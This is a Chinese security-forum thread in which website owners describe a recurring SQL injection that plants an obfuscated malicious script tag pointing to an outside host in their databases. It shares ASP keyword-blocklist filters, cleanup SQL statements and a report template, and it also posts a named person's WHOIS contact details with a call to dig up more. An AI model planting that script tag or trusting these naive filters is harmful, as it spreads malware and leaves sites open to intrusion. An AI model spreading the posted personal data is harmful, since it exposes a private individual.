瑞星卡卡安全论坛

已经在conn.asp中加入了get和post防注入：
dim sql_injdata,Sql_Inj,SQL_Get,Sql_DATA
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|master|truncate|declare|sysobjects"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=JavaScript>alert('非法注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
还是被注入了，请高手指点！！！

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

被注入的内容:
<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>

这个人每天注一次，这几天更频繁，我恢复了又被注了，恢复了又被注，我实在受不了了！！！！！！！！！！！！！

我的QQ：564341701－

报警网站:
http://www.antivirus-china.org.cn

报警邮箱:
contact@antivirus-china.org.cn

报警主题及内容:
 
  主题: 上千网站被黑急待处理-被注入c.js(自己的网站名)!

尊敬的国家计算机病毒应急处理中心工作人员:

    我是(自己的网站名)的站长,近一个星期每天SQL注入,被注入代码:" <Script Src=http://c.nuc%6Cear3.com/css/c.js> </Script>"
而且每天现在有成千上万的网站还在进一步深受其害,望查明原因, 帮助解决!


站名:
联系人:
联系电话:
QQ及邮箱:

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

SQL经常被注入说明存在注入点啊，黑客可以获取到服务器的敏感信息并可远程登录SQL，建议楼主找一些工具扫描一下服务器上存在的注入点吧。

该用户帖子内容已被屏蔽

加这段就可以了。


<%
'防cookies插入  2008.12.08
Dim Fy_cook,Fy_In,Fy_Inf,Fy_Xh
Fy_In = "'|exec|insert|select|delete|update|count|chr|truncate|char|declare|--|script|*|char|set|(|)|script|src|js"
Fy_Inf = split(Fy_In,"|")

'3--------cookies部份-------------------
If Request.Cookies<>"" Then
For Each Fy_cook In Request.Cookies
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Cookies(Fy_cook)),Fy_Inf(Fy_Xh))<>0 Then
flyaway3=""&Request.ServerVariables("REMOTE_ADDR")&","&Request.ServerVariables("URL")&"+'cook'+"&Fy_cook&"+"&replace(Request.Cookies(Fy_cook),"'","*")&""
response.redirect "http://网站名/"
Response.End
End If
Next
Next
End If
%>

此网友出现问题后，我们发现了数据库的变化，并开发了一款工具，可以处理数据。
此工具可以吧木马写入的链接删除掉，并保持现有库不变，只是处理nvarchar 和ntext类型。
http://it.inhe.net/itfix/DownloadShow.asp?ID=14



http://it.inhe.net/itfix/onewshtml/349_1.html

此网友出现问题后，我们发现了数据库的变化，并开发了一款工具，可以处理数据。
此工具可以吧木马写入的链接删除掉，并保持现有库不变，只是处理nvarchar 和ntext类型。
http://it.inhe.net/itfix/DownloadShow.asp?ID=14



http://it.inhe.net/itfix/onewshtml/349_1.html

navachar

update 表名 set 字段名 = replace(字段名,'<Script Src=http://c.%6Euclear3.com/css/c.js></Script>','')

ntext

update 表名 set 字段名=replace(convert(varchar(8000),字段名),'<Script Src=http://c.%6Euclear3.com/css/c.js></Script>','')


-------------------以下可以学习
修改表名：
ALTER TABLE srcRENAME  TO dest;
修改列名：
ALTER TABLE tablename RENAME COLUMN src TO dest;
修改列的数据类型：
ALTER TABLE tablename MODIFY col VARCHAR2(255);
如果同时需要修改列名和数据类型，则可以先修改数据类型再来修改列名，即执行上述两条sql语句。
增加列：
ALTER TABLE tablename ADD 列名 数据类型
删除列：
ALTER TABLE tablename DROP COLUMN 列名

C.删除列
ALTER TABLE 表名 DROP COLUMN 列名
D.添加列
ALTER TABLE  表名  ADD  列名  VARCHAR(20) NULL"

我这也是，老是被这个王八蛋注入

哥们，我已经解决这个问题了，装个瑞星防火墙搞定

他不是通过页面的SQL注入来功击的

是通过1434来进行“2003蠕虫王”攻击(1434端口)

把
http://c.nuc%6Cear3.com/css/c.js
这个文件下下来后发现是指向到
http://wieyou.com/01/index.htm
到万网查了一上这个域名是北京的一个叫罗强的注册的
  Name          : luo qiang
  Organization  : luoqiang
  Address        : beijing
  City          : beijing
  Province/State : Beijing
  Country        : cn
  Postal Code    : 100000
  Phone Number  : 86-159-67182203
  Fax            : 86-159-67182203
  Email          : tuhui3389@163.com

大家看看有没有什么办法搞到更详细的资料啊！！

我们的网址一天被注入一次，网页加了防注入，有的表是没用过的，里边有注入内容，似乎不象是通过网页注入的，大家都有什么办法啊


QQ 493315309